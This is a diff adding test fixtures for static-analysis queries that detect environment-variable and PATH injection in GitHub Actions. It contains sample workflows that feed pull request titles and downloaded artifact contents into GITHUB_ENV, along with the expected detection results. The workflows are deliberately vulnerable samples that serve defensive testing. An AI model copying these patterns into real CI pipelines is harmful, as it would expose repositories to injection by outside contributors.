+ PR_NUMBER=${{ github.event.pull_request.number }} + PR_TITLE=$(gh pr view $PR_NUMBER --json title --jq '.title') + else + # Use gh to find the PR associated with the commit + COMMIT_SHA=${{ github.event.after }} + PR_JSON=$(gh pr list --search "${COMMIT_SHA}" --state merged --json number,title --jq '.[0]') + PR_NUMBER=$(echo $PR_JSON | jq -r '.number') + PR_TITLE=$(echo $PR_JSON | jq -r '.title') + fi + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV + echo "PR_TITLE=$PR_TITLE" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml new file mode 100644 index 000000000000..1c4b1e863122 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml @@ -0,0 +1,32 @@ +on: + schedule: + - cron: '0 0 * * *' + pull_request: + types: [ opened, synchronize, reopened ] + branches: ["master", "*-rc"] + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - name: Checkout Repository + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Set Branch Variables + id: set-branch-variables + env: + github_event_pull_request_head_repo_owner_login: ${{ github.event.pull_request.head.repo.owner.login }} + github_repository_owner: ${{ github.repository_owner }} + run: | + # Set the Repo Owner + REPO_OWNER="${github_event_pull_request_head_repo_owner_login:-$github_repository_owner}" + echo "REPO_OWNER=$REPO_OWNER" >> $GITHUB_ENV + - name: Sanitize Github Variables + id: sanitize-github-variables + env: + GITHUB_EVENT_PULL_REQUEST_TITLE: ${{ github.event.pull_request.title }} + run: | + # Delete non-alphanumeric characters and limit to 75 chars which is the branch title limit in GitHub + SAFE_PULL_REQUEST_TITLE=$(echo "${GITHUB_EVENT_PULL_REQUEST_TITLE}" | tr -cd '[:alnum:]_ -' | cut -c1-75) + echo "SAFE_PULL_REQUEST_TITLE=$SAFE_PULL_REQUEST_TITLE" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml new file mode 100644 index 000000000000..3b3b4b99ca10 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml @@ -0,0 +1,40 @@ +on: + pull_request: + workflow_dispatch: + +jobs: + build: + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + steps: + - name: Get the appropriate Endo branch + id: branch + uses: actions/github-script@v7 + with: + result-encoding: string + script: |- + let branch = 'NOPE'; + if (context.payload.pull_request) { + const { body } = context.payload.pull_request; + const regex = /^\#endo-branch:\s+(\S+)/m; + const result = regex.exec(body); + if (result) { + branch = result[1]; + } + } + return branch; + - name: check out + id: checkout + if: steps.branch.outputs.result != 'NOPE' + uses: actions/checkout@v4 + with: + repository: test/test + path: ./tmp + ref: ${{ steps.branch.outputs.result }} + clean: 'false' + submodules: 'true' + persist-credentials: false + + - name: Find Netlify site ID + run: | + echo "NETLIFY_SITE_ID=$(cat COVERAGE_NETLIFY_SITE_ID)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml new file mode 100644 index 000000000000..c902b7e61bd2 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test2.yml @@ -0,0 +1,43 @@ +name: Test +on: + workflow_run: + workflows: ["Generate Preview"] + types: + - completed + +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download artifact' + uses: actions/github-script@v3.1.0 + with: + script: | + var artifacts = await github.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{ github.event.workflow_run.id }}, + }); + var matchPrArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "pr" + })[0]; + var matchPreviewArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "preview" + })[0]; + var downloadPr = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPrArtifact.id, + archive_format: 'zip', + }); + var downloadPreview = await github.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchPreviewArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/pr.zip', Buffer.from(downloadPr.data)); + - run: | + unzip pr.zip + echo "pr_number=$(cat NR)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml new file mode 100644 index 000000000000..f76454c6088f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test3.yml @@ -0,0 +1,23 @@ +name: Test +on: + workflow_run: + workflows: ['checks'] + types: + - completed + +jobs: + + test: + runs-on: ubuntu-latest + steps: + - name: Download PR metadata + uses: dawidd6/action-download-artifact@e6e25ac3a2b93187502a8be1ef9e9603afc34925 # v2.24.2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + workflow_conclusion: '' + name: pr_metadata + if_no_artifact_found: 'ignore' + - run: | + echo "PR_NUMBER=$(cat pr_number.txt | jq -r .)" >> $GITHUB_ENV + echo "PR_HEAD_REPO=$(cat pr_head_repo.txt | jq -Rr .)" >> $GITHUB_ENV + echo "PR_HEAD_REF=$(cat pr_head_ref.txt | jq -Rr .)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml new file mode 100644 index 000000000000..7b30ec8b7e42 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test4.yml @@ -0,0 +1,71 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PR_TITLE<> $GITHUB_ENV + echo "$TITLE" >> $GITHUB_ENV + echo "EOF" >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}" + echo "$TITLE" >> "${GITHUB_ENV}" + echo "EOF" >> "${GITHUB_ENV}" + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + cat <<-EOF >> "$GITHUB_ENV" + FOO=$TITLE + EOF + - env: + TITLE: ${{ github.event.pull_request.head.ref }} + run: | + echo "PR_TITLE=$TITLE" >> $GITHUB_ENV + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.head_ref }} + - run: echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV + env: + TARGET_BRANCH: ${{ github.event.pull_request.title }} + - run: echo ISSUE_KEY=$(echo "${TITLE}" | grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV + env: + TITLE: ${{ github.event.pull_request.title }} + - env: + TITLE: |- + ${{ github.event.pull_request.title }} + run: | + cat > issue.txt << EOL + ${TITLE} + EOL + echo REPO_NAME=$(cat issue.txt | sed 's/\r/\n/g' | grep -ioE '\s*[a-z0-9_-]+/[a-z0-9_-]+\s*$' | tr -d ' ') >> $GITHUB_ENV + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml new file mode 100644 index 000000000000..cfc5e6ef1fa5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml @@ -0,0 +1,36 @@ +name: Test +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + test: + runs-on: ubuntu-latest + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml new file mode 100644 index 000000000000..36340258515e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -0,0 +1,28 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=${TITLE##*/} + echo PR_TITLE=${FOO} >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=$TITLE+ + echo PR_TITLE=$FOO >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + venv="$(echo $TITLE)')" + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + + + + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml new file mode 100644 index 000000000000..c33c90dbb9c6 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test7.yml @@ -0,0 +1,25 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Load .env file + uses: aarcangeli/load-dotenv@v1.0.0 + with: + path: 'backend/new' + filenames: | + .env + .env.test + quiet: false + if-file-not-found: error + diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml new file mode 100644 index 000000000000..806f8dc8e45c --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test8.yml @@ -0,0 +1,39 @@ +name: Tests + +on: + workflow_run: + workflows: ["tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + unit-test-results: + name: Test + runs-on: ubuntu-latest + permissions: + actions: write + statuses: write + checks: write + pull-requests: write + contents: write + steps: + - uses: actions/checkout@v4 + + - name: Download and Extract Artifacts + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + path: ./artifacts + + - name: assignment + run: | + foo=$(cat ./artifacts/parent-artifacts/event.txt) + echo "foo=$foo" >> $GITHUB_ENV + - name: direct 1 + run: | + echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV + - name: direct 2 + run: | + echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml new file mode 100644 index 000000000000..3ed80374ef65 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/.github/workflows/test9.yml @@ -0,0 +1,41 @@ +name: tests + +on: + workflow_run: + workflows: ["Tests"] + types: + - completed + +permissions: { contents: read } + +jobs: + get-artifacts: + name: Get required artifacts + runs-on: ubuntu-latest + permissions: + actions: read + statuses: write + steps: + - name: Download and extract event file + uses: actions/download-artifact@v4 + with: + github-token: ${{ secrets.GITHUB_TOKEN }} + run-id: ${{ github.event.workflow_run.id }} + name: event_file + path: artifacts/event_file + + - name: Try to read PR number + id: set-ref + run: | + pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json) + if [ -z "$pr_num" ] || [ "$pr_num" == "null" ]; then + pr_num="" + fi + + ref=$pr_num + if [ -z "$ref" ] || [ "$ref" == "null" ]; then + ref=${{ github.ref }} + fi + + echo "pr_num=$pr_num" >> $GITHUB_ENV + echo "ref=$ref" >> $GITHUB_ENV diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected new file mode 100644 index 000000000000..f544994fc5c1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -0,0 +1,24 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | +subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref new file mode 100644 index 000000000000..80f72124fe45 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected new file mode 100644 index 000000000000..5be9f729ad64 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -0,0 +1,19 @@ +edges +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | Config | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | Config | +nodes +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | semmle.label | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | semmle.label | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | semmle.label | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | +subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref new file mode 100644 index 000000000000..165a3d20896b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected new file mode 100644 index 000000000000..9914ae91df12 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected @@ -0,0 +1,131 @@ +edges +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | Config | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | Config | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | provenance | Config | +| .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:15:14:17:63 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt)" >> $GITHUB_ENV\n | provenance | Config | +| .github/workflows/test16.yml:10:9:15:6 | Uses Step | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | provenance | Config | +nodes +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | semmle.label | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | semmle.label | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | semmle.label | Run Step | +| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 